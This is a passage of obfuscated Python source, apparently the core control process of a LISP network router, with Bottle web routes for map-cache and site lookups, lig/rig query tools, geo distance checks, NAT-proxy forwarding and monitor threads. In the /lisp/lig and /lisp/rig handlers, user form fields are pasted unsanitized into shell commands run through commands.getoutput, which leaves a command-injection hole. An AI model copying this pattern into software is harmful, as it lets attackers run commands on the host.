o00 = lisp . lisp_print_sans ( "Invalid command" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
i11I1iIiII = lisp . lisp_command_ipc ( i11I1iIiII , "lisp-core" )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , i11IiIIi11I )
I1I1I11Ii = commands . getoutput ( "egrep 'lisp map-cache' ./lisp.config" )
if ( I1I1I11Ii != "" ) :
os . system ( "touch ./lisp.config" )
o00 = lisp . lisp_print_sans ( "{} cleared" . format ( o000o0O0Oo00 ) )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
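# /lisp/show/map-server: run the "show map-server" command.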
@ bottle . route ( '/lisp/show/map-server' )
def II11i1IiIII ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show map-server" ) )
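# /lisp/show/database: show configured database-mappings.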
@ bottle . route ( '/lisp/show/database' )
def Iiii1iiiIiI1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show database-mapping" ) )
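# /lisp/show/itr/map-cache: show the ITR's map-cache.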
@ bottle . route ( '/lisp/show/itr/map-cache' )
def OO0o0oO0O000o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show itr-map-cache" ) )
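# /lisp/show/itr/rloc-probing: show the ITR's RLOC-probe state.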
@ bottle . route ( '/lisp/show/itr/rloc-probing' )
def oOIIIiI1ii1IIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show itr-rloc-probing" ) )
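# POST /lisp/show/itr/map-cache/lookup: look up one EID in the ITR map-cache.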
@ bottle . post ( '/lisp/show/itr/map-cache/lookup' )
def O0oo0O0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
Oo0O0 = "show itr-map-cache" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo ,
Oo0O0 ) )
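# /lisp/show/rtr/map-cache[/dns]: show the RTR's map-cache, optionally the
# DNS-name variant.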
@ bottle . route ( '/lisp/show/rtr/map-cache' )
@ bottle . route ( '/lisp/show/rtr/map-cache/<dns>' )
def i1I1II ( dns = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if ( dns == "dns" ) :
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show rtr-map-cache-dns" ) )
else :
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show rtr-map-cache" ) )
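# /lisp/show/rtr/rloc-probing: show the RTR's RLOC-probe state.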
@ bottle . route ( '/lisp/show/rtr/rloc-probing' )
def I11 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show rtr-rloc-probing" ) )
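# POST /lisp/show/rtr/map-cache/lookup: look up one EID in the RTR map-cache.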
@ bottle . post ( '/lisp/show/rtr/map-cache/lookup' )
def iiiIIIii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
Oo0O0 = "show rtr-map-cache" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo ,
Oo0O0 ) )
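# /lisp/show/referral: show the map-resolver's DDT referral-cache.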
@ bottle . route ( '/lisp/show/referral' )
def iiii1i1II1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show referral-cache" ) )
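# POST /lisp/show/referral/lookup: look up one EID in the referral-cache.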
@ bottle . post ( '/lisp/show/referral/lookup' )
def I1III1iIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
Oo0O0 = "show referral-cache" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
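# /lisp/show/delegations: show DDT delegations.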
@ bottle . route ( '/lisp/show/delegations' )
def IiIIiiI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
return ( lispconfig . lisp_process_show_command ( O0OOo ,
"show delegations" ) )
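# POST /lisp/show/delegations/lookup: look up one EID in the delegations.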
@ bottle . post ( '/lisp/show/delegations/lookup' )
def oOOoO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
Oo0O0 = "show delegations" + "%" + iI1IiiiIiI1Ii
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
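# /lisp/show/site[/<eid_prefix>]: show map-server site registration state.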
@ bottle . route ( '/lisp/show/site' )
@ bottle . route ( '/lisp/show/site/<eid_prefix>' )
def oO0OIiii1I ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
Oo0O0 = "show site"
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
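# /lisp/show/itr/dynamic-eid/<eid_prefix>: show the ITR's dynamic-EID state.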
@ bottle . route ( '/lisp/show/itr/dynamic-eid/<eid_prefix>' )
def O0000oO0o00 ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
Oo0O0 = "show itr-dynamic-eid"
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
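# /lisp/show/etr/dynamic-eid/<eid_prefix>: show the ETR's dynamic-EID state.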
@ bottle . route ( '/lisp/show/etr/dynamic-eid/<eid_prefix>' )
def i111i1I1ii1i ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
Oo0O0 = "show etr-dynamic-eid"
if ( eid_prefix != "" ) :
Oo0O0 = lispconfig . lisp_parse_eid_in_url ( Oo0O0 , eid_prefix )
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
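# POST /lisp/show/site/lookup: longest-match lookup of one EID in the
# map-server site cache.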
@ bottle . post ( '/lisp/show/site/lookup' )
def IiII1i1iI ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
iI1IiiiIiI1Ii = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( iI1IiiiIiI1Ii ) == False ) :
o00 = "Address '{}' has invalid format" . format ( iI1IiiiIiI1Ii )
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
Oo0O0 = "show site" + "%" + iI1IiiiIiI1Ii + "@lookup"
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
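# POST /lisp/lig: run the bundled lisp-lig query tool against a map-resolver
# and render its output, indenting the RLOC/geo/elp/rle detail lines.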
@ bottle . post ( '/lisp/lig' )
def iii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
O0OoO0o = bottle . request . forms . get ( "eid" )
I111IIiIII = bottle . request . forms . get ( "mr" )
OO0OOoo0OOO = bottle . request . forms . get ( "count" )
ooooOoo0OO = "no-info" if bottle . request . forms . get ( "no-nat" ) == "yes" else ""
if ( I111IIiIII == "" ) : I111IIiIII = "localhost"
if ( O0OoO0o == "" ) :
o00 = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
iIIi1Ii1III = ""
if os . path . exists ( "lisp-lig.pyo" ) : iIIi1Ii1III = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : iIIi1Ii1III = "lisp-lig.py"
if ( iIIi1Ii1III == "" ) :
o00 = "Cannot find lisp-lig.py or lisp-lig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if ( OO0OOoo0OOO != "" ) : OO0OOoo0OOO = "count {}" . format ( OO0OOoo0OOO )
Oo0O0 = 'python {} "{}" to {} {} {}' . format ( iIIi1Ii1III , O0OoO0o , I111IIiIII , OO0OOoo0OOO , ooooOoo0OO )
o00 = commands . getoutput ( Oo0O0 )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = lisp . convert_font ( o00 )
i111IiiI1Ii = lisp . space ( 2 ) + "RLOC:"
o00 = o00 . replace ( "RLOC:" , i111IiiI1Ii )
OooOOOOOo = lisp . space ( 2 ) + "Empty,"
o00 = o00 . replace ( "Empty," , OooOOOOOo )
o0oooOO00 = lisp . space ( 4 ) + "geo:"
o00 = o00 . replace ( "geo:" , o0oooOO00 )
i1I11ii = lisp . space ( 4 ) + "elp:"
o00 = o00 . replace ( "elp:" , i1I11ii )
o0ooO00O0O = lisp . space ( 4 ) + "rle:"
o00 = o00 . replace ( "rle:" , o0ooO00O0O )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
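# POST /lisp/rig: run the bundled lisp-rig DDT query tool against a DDT node
# and render its output.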
@ bottle . post ( '/lisp/rig' )
def i111I11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
O0OoO0o = bottle . request . forms . get ( "eid" )
iiII1iiiiiii = bottle . request . forms . get ( "ddt" )
iiIiii = "follow-all-referrals" if bottle . request . forms . get ( "follow" ) == "yes" else ""
if ( iiII1iiiiiii == "" ) : iiII1iiiiiii = "localhost"
if ( O0OoO0o == "" ) :
o00 = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
Ooo000O00 = ""
if os . path . exists ( "lisp-rig.pyo" ) : Ooo000O00 = "-O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.py" ) : Ooo000O00 = "lisp-rig.py"
if ( Ooo000O00 == "" ) :
o00 = "Cannot find lisp-rig.py or lisp-rig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
Oo0O0 = 'python {} "{}" to {} {}' . format ( Ooo000O00 , O0OoO0o , iiII1iiiiiii , iiIiii )
o00 = commands . getoutput ( Oo0O0 )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = lisp . convert_font ( o00 )
I1 = lisp . space ( 2 ) + "Referrals:"
o00 = o00 . replace ( "Referrals:" , I1 )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
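# Helper for /lisp/geo: resolve two EIDs to their geo-coordinate strings by
# running lisp-lig against the first map-resolver found in ./lisp.config.
# Returns a two-element list; an element is None when no geo-point is found.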
def Ii1iiI1 ( eid1 , eid2 ) :
iIIi1Ii1III = None
if os . path . exists ( "lisp-lig.pyo" ) : iIIi1Ii1III = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : iIIi1Ii1III = "lisp-lig.py"
if ( iIIi1Ii1III == None ) : return ( [ None , None ] )
iiIi = commands . getoutput ( "egrep -A 2 'lisp map-resolver {' ./lisp.config" )
I111IIiIII = None
for I11Ii in [ "address = " , "dns-name = " ] :
I111IIiIII = None
O0oo0 = iiIi . find ( I11Ii )
if ( O0oo0 == - 1 ) : continue
I111IIiIII = iiIi [ O0oo0 + len ( I11Ii ) : : ]
O0oo0 = I111IIiIII . find ( "\n" )
if ( O0oo0 == - 1 ) : continue
I111IIiIII = I111IIiIII [ 0 : O0oo0 ]
break
if ( I111IIiIII == None ) : return ( [ None , None ] )
OOOO = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
oOIii11111iiI = [ ]
for O0OoO0o in [ eid1 , eid2 ] :
if ( OOOO . is_geo_string ( O0OoO0o ) ) :
oOIii11111iiI . append ( O0OoO0o )
continue
Oo0O0 = 'python {} "{}" to {} count 1' . format ( iIIi1Ii1III , O0OoO0o , I111IIiIII )
for I1i in [ Oo0O0 , Oo0O0 + " no-info" ] :
o00 = commands . getoutput ( I1i )
O0oo0 = o00 . find ( "geo: " )
if ( O0oo0 == - 1 ) :
if ( I1i != Oo0O0 ) : oOIii11111iiI . append ( None )
continue
o00 = o00 [ O0oo0 + len ( "geo: " ) : : ]
O0oo0 = o00 . find ( "\n" )
if ( O0oo0 == - 1 ) :
if ( I1i != Oo0O0 ) : oOIii11111iiI . append ( None )
continue
oOIii11111iiI . append ( o00 [ 0 : O0oo0 ] )
break
return ( oOIii11111iiI )
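# POST /lisp/geo: parse (or look up via lisp-lig) a geo-point and a
# geo-prefix, then show both as map URLs, the distance between them, and
# whether the point falls inside the prefix's radius.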
@ bottle . post ( '/lisp/geo' )
def iI1iiIi1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
O0OoO0o = bottle . request . forms . get ( "geo-point" )
Ii11iiI = bottle . request . forms . get ( "geo-prefix" )
o00 = ""
I1iI1I1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iIIi1 = lisp . lisp_geo ( "" )
o0Ooo0o0Oo = lisp . lisp_geo ( "" )
oo00ooooOOo00 , ii1i = Ii1iiI1 ( O0OoO0o , Ii11iiI )
if ( I1iI1I1ii1 . is_geo_string ( O0OoO0o ) ) :
if ( iIIi1 . parse_geo_string ( O0OoO0o ) == False ) :
o00 = "Could not parse geo-point format"
elif ( oo00ooooOOo00 == None ) :
o00 = "EID {} lookup could not find geo-point" . format (
lisp . bold ( O0OoO0o , True ) )
elif ( iIIi1 . parse_geo_string ( oo00ooooOOo00 ) == False ) :
o00 = "Could not parse geo-point format returned from lookup"
if ( o00 == "" ) :
if ( I1iI1I1ii1 . is_geo_string ( Ii11iiI ) ) :
if ( o0Ooo0o0Oo . parse_geo_string ( Ii11iiI ) == False ) :
o00 = "Could not parse geo-prefix format"
elif ( ii1i == None ) :
o00 = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( Ii11iiI , True ) )
elif ( o0Ooo0o0Oo . parse_geo_string ( ii1i ) == False ) :
o00 = "Could not parse geo-prefix format returned from lookup"
if ( o00 == "" ) :
O0OoO0o = "" if ( O0OoO0o == oo00ooooOOo00 ) else ", EID {}" . format ( O0OoO0o )
Ii11iiI = "" if ( Ii11iiI == ii1i ) else ", EID-prefix {}" . format ( Ii11iiI )
II111IIIII = iIIi1 . print_geo_url ( )
IIiIi1 = o0Ooo0o0Oo . print_geo_url ( )
O00O00o = o0Ooo0o0Oo . radius
I11IiI1iI = iIIi1 . dms_to_decimal ( )
I11IiI1iI = ( round ( I11IiI1iI [ 0 ] , 6 ) , round ( I11IiI1iI [ 1 ] , 6 ) )
O0OO0OoO = o0Ooo0o0Oo . dms_to_decimal ( )
O0OO0OoO = ( round ( O0OO0OoO [ 0 ] , 6 ) , round ( O0OO0OoO [ 1 ] , 6 ) )
o0OOo = round ( o0Ooo0o0Oo . get_distance ( iIIi1 ) , 2 )
IiI1Ii11Ii = "inside" if o0Ooo0o0Oo . point_in_circle ( iIIi1 ) else "outside"
i1i1 = lisp . space ( 2 )
I1iiIiIII = lisp . space ( 1 )
o0IiIiI111IIII1 = lisp . space ( 3 )
o00 = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( i1i1 , II111IIIII , I11IiI1iI , O0OoO0o ,
I1iiIiIII , IIiIi1 , O0OO0OoO , O00O00o , Ii11iiI )
o00 += "Distance:{}{} kilometers, point is {} of circle" . format ( o0IiIiI111IIII1 ,
o0OOo , lisp . bold ( IiI1Ii11Ii , True ) )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
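# Find a cached NAT-traversal info-source, either by translated address and
# port or by Map-Request nonce. Returns None when there is no match.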
def OooO00oO ( addr_str , port , nonce ) :
if ( addr_str != None ) :
for OOoOOOo0 in lisp . lisp_info_sources_by_address . values ( ) :
oOoO00O = OOoOOOo0 . address . print_address_no_iid ( )
if ( oOoO00O == addr_str and OOoOOOo0 . port == port ) :
return ( OOoOOOo0 )
return ( None )
if ( nonce != None ) :
if ( nonce not in lisp . lisp_info_sources_by_nonce ) : return ( None )
return ( lisp . lisp_info_sources_by_nonce [ nonce ] )
return ( None )
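# NAT-proxy a Map-Request: decapsulate the ECM received from an info-source,
# cache its nonce, rewrite the ITR-RLOC list to a local RLOC, and
# re-originate the Map-Request toward the mapping system.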
def O0oO ( lisp_sockets , info_source , packet ) :
iiii11IiIiI = lisp . lisp_ecm ( 0 )
packet = iiii11IiIiI . decode ( packet )
if ( packet == None ) :
lisp . lprint ( "Could not decode ECM packet" )
return ( True )
ooO0000o00O = lisp . lisp_control_header ( )
if ( ooO0000o00O . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return ( True )
if ( ooO0000o00O . type != lisp . LISP_MAP_REQUEST ) :
lisp . lprint ( "Received ECM without Map-Request inside" )
return ( True )
oOO00OO0OooOo = lisp . lisp_map_request ( )
packet = oOO00OO0OooOo . decode ( packet , None , 0 )
ii111iI1i1 = oOO00OO0OooOo . nonce
OO000 = info_source . address . print_address_no_iid ( )
oOO00OO0OooOo . print_map_request ( )
lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
lisp . red ( OO000 , False ) , info_source . port ,
lisp . lisp_hex_string ( ii111iI1i1 ) ) )
info_source . cache_nonce_for_info_source ( ii111iI1i1 )
info_source . no_timeout = oOO00OO0OooOo . subscribe_bit
for o0oo0Oo in oOO00OO0OooOo . itr_rlocs :
if ( o0oo0Oo . is_local ( ) ) : return ( False )
oooOo00000 = lisp . lisp_myrlocs [ 0 ]
oOO00OO0OooOo . itr_rloc_count = 0
oOO00OO0OooOo . itr_rlocs = [ ]
oOO00OO0OooOo . itr_rlocs . append ( oooOo00000 )
packet = oOO00OO0OooOo . encode ( None , 0 )
oOO00OO0OooOo . print_map_request ( )
I1Iiii = oOO00OO0OooOo . target_eid
if ( I1Iiii . is_ipv6 ( ) ) :
I1I1Iii1Iiii = lisp . lisp_myrlocs [ 1 ]
if ( I1I1Iii1Iiii != None ) : oooOo00000 = I1I1Iii1Iiii
OooO00oo0O0 = lisp . lisp_is_running ( "lisp-ms" )
lisp . lisp_send_ecm ( lisp_sockets , packet , I1Iiii , lisp . LISP_CTRL_PORT ,
I1Iiii , oooOo00000 , to_ms = OooO00oo0O0 , ddt = False )
return ( True )
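# Forward a Map-Reply or Map-Notify back to the NATed info-source that
# originated the request, using its translated address and port.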
def ooOo0O0 ( lisp_sockets , info_source , packet , mr_or_mn ) :
OO000 = info_source . address . print_address_no_iid ( )
o0o = info_source . port
ii111iI1i1 = info_source . nonce
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp . bold ( "nat-proxy Map-{}" . format ( mr_or_mn ) , False )
lisp . lprint ( "Forward {} to info-source {}, port {}, nonce 0x{}" . format ( mr_or_mn , lisp . red ( OO000 , False ) , o0o ,
lisp . lisp_hex_string ( ii111iI1i1 ) ) )
o0oi1I1I1I = lisp . lisp_convert_4to6 ( OO000 )
lisp . lisp_send ( lisp_sockets , o0oi1I1I1I , o0o , packet )
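# Main control-packet dispatcher for lisp-core: hand each received LISP
# control message to a pending nat-proxy request, to lig/rig when running,
# or to the appropriate component process (ITR/ETR/RTR/MR/MS/DDT) over IPC.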
def O0O00O0Oo0 ( lisp_sockets , source , sport , packet ) :
global O0OOo
ooO0000o00O = lisp . lisp_control_header ( )
if ( ooO0000o00O . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return
if ( ooO0000o00O . type == lisp . LISP_NAT_INFO ) :
if ( ooO0000o00O . info_reply == False ) :
lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
lisp . lisp_ms_rtr_list )
return
OO0o0o0oo = packet
packet = lisp . lisp_packet_ipc ( packet , source , sport )
if ( ooO0000o00O . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
lisp . lisp_ipc ( packet , O0OOo , "lisp-ms" )
return
if ( ooO0000o00O . type == lisp . LISP_MAP_REPLY ) :
iIi1Ii1111i = lisp . lisp_map_reply ( )
iIi1Ii1111i . decode ( OO0o0o0oo )
OOoOOOo0 = OooO00oO ( None , 0 , iIi1Ii1111i . nonce )
if ( OOoOOOo0 ) :
ooOo0O0 ( lisp_sockets , OOoOOOo0 , OO0o0o0oo , True )
else :
iIIi1Ii1III = "/tmp/lisp-lig"
if ( os . path . exists ( iIIi1Ii1III ) ) :
lisp . lisp_ipc ( packet , O0OOo , iIIi1Ii1III )
else :
lisp . lisp_ipc ( packet , O0OOo , "lisp-itr" )
return
if ( ooO0000o00O . type == lisp . LISP_MAP_NOTIFY ) :
o0OoO0000oOO = lisp . lisp_map_notify ( lisp_sockets )
o0OoO0000oOO . decode ( OO0o0o0oo )
OOoOOOo0 = OooO00oO ( None , 0 , o0OoO0000oOO . nonce )
if ( OOoOOOo0 ) :
ooOo0O0 ( lisp_sockets , OOoOOOo0 , OO0o0o0oo ,
False )
else :
iIIi1Ii1III = "/tmp/lisp-lig"
if ( os . path . exists ( iIIi1Ii1III ) ) :
lisp . lisp_ipc ( packet , O0OOo , iIIi1Ii1III )
else :
i11IiIIi11I = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
lisp . lisp_ipc ( packet , O0OOo , i11IiIIi11I )
return
if ( ooO0000o00O . type == lisp . LISP_MAP_REFERRAL ) :
Ooo000O00 = "/tmp/lisp-rig"
if ( os . path . exists ( Ooo000O00 ) ) :
lisp . lisp_ipc ( packet , O0OOo , Ooo000O00 )
else :
lisp . lisp_ipc ( packet , O0OOo , "lisp-mr" )
return
if ( ooO0000o00O . type == lisp . LISP_MAP_REQUEST ) :
i11IiIIi11I = "lisp-itr" if ( ooO0000o00O . is_smr ( ) ) else "lisp-etr"
if ( ooO0000o00O . rloc_probe ) : return
lisp . lisp_ipc ( packet , O0OOo , i11IiIIi11I )
return
if ( ooO0000o00O . type == lisp . LISP_ECM ) :
OOoOOOo0 = OooO00oO ( source , sport , None )
if ( OOoOOOo0 ) :
if ( O0oO ( lisp_sockets , OOoOOOo0 ,
OO0o0o0oo ) ) : return
i11IiIIi11I = "lisp-mr"
if ( ooO0000o00O . is_to_etr ( ) ) :
i11IiIIi11I = "lisp-etr"
elif ( ooO0000o00O . is_to_ms ( ) ) :
i11IiIIi11I = "lisp-ms"
elif ( ooO0000o00O . is_ddt ( ) ) :
if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
i11IiIIi11I = "lisp-ddt"
elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
i11IiIIi11I = "lisp-ms"
elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
i11IiIIi11I = "lisp-etr"
lisp . lisp_ipc ( packet , O0OOo , i11IiIIi11I )
return
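# bottle ServerAdapter that serves the web UI over TLS with ./lisp-cert.pem,
# copying lisp-cert.pem.default into place on first use. wsgi_server and
# ssl_adaptor are presumably bound earlier in this file (not shown here).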
class iI1iiiiiii ( bottle . ServerAdapter ) :
def run ( self , hand ) :
Oo00oo = "./lisp-cert.pem"
if ( os . path . exists ( Oo00oo ) == False ) :
os . system ( "cp ./lisp-cert.pem.default {}" . format ( Oo00oo ) )
lisp . lprint ( ( "{} does not exist, creating a copy from lisp-" + "cert.pem.default" ) . format ( Oo00oo ) )
O0O0Oo00OO = wsgi_server ( ( self . host , self . port ) , hand )
O0O0Oo00OO . ssl_adapter = ssl_adaptor ( Oo00oo , Oo00oo , None )
try :
O0O0Oo00OO . start ( )
finally :
O0O0Oo00OO . stop ( )
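# Thread entry for the web frontend: a negative port selects plain HTTP;
# otherwise try the TLS server registered above and fall back to plain bottle.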
def Oooo0Oo00o ( bottle_port ) :
lisp . lisp_set_exception ( )
if ( bottle_port < 0 ) :
bottle . run ( host = "0.0.0.0" , port = - bottle_port )
return
bottle . server_names [ "lisp-ssl-server" ] = iI1iiiiiii
try :
bottle . run ( host = "0.0.0.0" , port = bottle_port , server = "lisp-ssl-server" ,
fast = True )
except :
bottle . run ( host = "0.0.0.0" , port = bottle_port , fast = True )
return
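# Placeholder thread entry; installs the exception hook and returns.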
def o0oO00OOo0oO ( ) :
lisp . lisp_set_exception ( )
return
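# Monitor thread: once a second, poll which LISP component processes are
# running and push the stored configuration to any process that just came up.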
def oO0o000oOO ( lisp_socket ) :
lisp . lisp_set_exception ( )
ooo0O = { "lisp-itr" : False , "lisp-etr" : False , "lisp-rtr" : False ,
"lisp-mr" : False , "lisp-ms" : False , "lisp-ddt" : False }
while ( True ) :
time . sleep ( 1 )
II1i = ooo0O
ooo0O = { }
for i11IiIIi11I in II1i :
ooo0O [ i11IiIIi11I ] = lisp . lisp_is_running ( i11IiIIi11I )
if ( II1i [ i11IiIIi11I ] == ooo0O [ i11IiIIi11I ] ) : continue
lisp . lprint ( "*** Process '{}' has {} ***" . format ( i11IiIIi11I ,
"come up" if ooo0O [ i11IiIIi11I ] else "gone down" ) )
if ( ooo0O [ i11IiIIi11I ] == True ) :
lisp . lisp_ipc_lock . acquire ( )
lispconfig . lisp_send_commands ( lisp_socket , i11IiIIi11I )
lisp . lisp_ipc_lock . release ( )
return
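# Timeout thread: every 60 seconds, expire NAT info-sources that have not
# refreshed within the interval (unless marked no-timeout) and drop their
# cached nonces.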
def o0O0OOOo0 ( ) :
lisp . lisp_set_exception ( )
I1ii1i = 60
while ( True ) :
time . sleep ( I1ii1i )
o0oo00O = [ ]
IIIIII1iI1II = lisp . lisp_get_timestamp ( )
for Ooo0 in lisp . lisp_info_sources_by_address :
OOoOOOo0 = lisp . lisp_info_sources_by_address [ Ooo0 ]
if ( OOoOOOo0 . no_timeout ) : continue
if ( OOoOOOo0 . uptime + I1ii1i < IIIIII1iI1II ) : continue
o0oo00O . append ( Ooo0 )
ii111iI1i1 = OOoOOOo0 . nonce
if ( ii111iI1i1 == None ) : continue
if ( ii111iI1i1 in lisp . lisp_info_sources_by_nonce ) :
lisp . lisp_info_sources_by_nonce . pop ( ii111iI1i1 )
for Ooo0 in o0oo00O :
lisp . lisp_info_sources_by_address . pop ( Ooo0 )
return
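# IPC loop: receive "control-packet@<dest>@<port>@<payload>" messages from
# component processes and transmit them; Map-Replies for pending nat-proxy
# requests are redirected through the dispatcher above.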
def oOoO ( lisp_ipc_control_socket , lisp_sockets ) :
lisp . lisp_set_exception ( )
while ( True ) :
try : OOooooO = lisp_ipc_control_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
O000oo = OOooooO [ 0 ] . split ( "@" )
II11iIiIIIiI = OOooooO [ 1 ]
O0OOO = O000oo [ 0 ]
o0oi1I1I1I = O000oo [ 1 ]
o0o = int ( O000oo [ 2 ] )
ooOoOoo000O0O = O000oo [ 3 : : ]
if ( len ( ooOoOoo000O0O ) > 1 ) :
ooOoOoo000O0O = lisp . lisp_bit_stuff ( ooOoOoo000O0O )
else :
ooOoOoo000O0O = ooOoOoo000O0O [ 0 ]
if ( O0OOO != "control-packet" ) :
lisp . lprint ( ( "lisp_core_control_packet_process() received " + "unexpected control-packet, message ignored" ) )
continue
lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( ooOoOoo000O0O ) ,
II11iIiIIIiI , o0oi1I1I1I , o0o , lisp . lisp_format_packet ( ooOoOoo000O0O ) ) )
ooO0000o00O = lisp . lisp_control_header ( )
ooO0000o00O . decode ( ooOoOoo000O0O )
if ( ooO0000o00O . type == lisp . LISP_MAP_REPLY ) :
iIi1Ii1111i = lisp . lisp_map_reply ( )
iIi1Ii1111i . decode ( ooOoOoo000O0O )
if ( OooO00oO ( None , 0 , iIi1Ii1111i . nonce ) ) :
O0O00O0Oo0 ( lisp_sockets , II11iIiIIIiI , o0o , ooOoOoo000O0O )
continue
if ( ooO0000o00O . type == lisp . LISP_MAP_NOTIFY and II11iIiIIIiI == "lisp-etr" ) :
i11I1iIiII = lisp . lisp_packet_ipc ( ooOoOoo000O0O , II11iIiIIIiI , o0o )
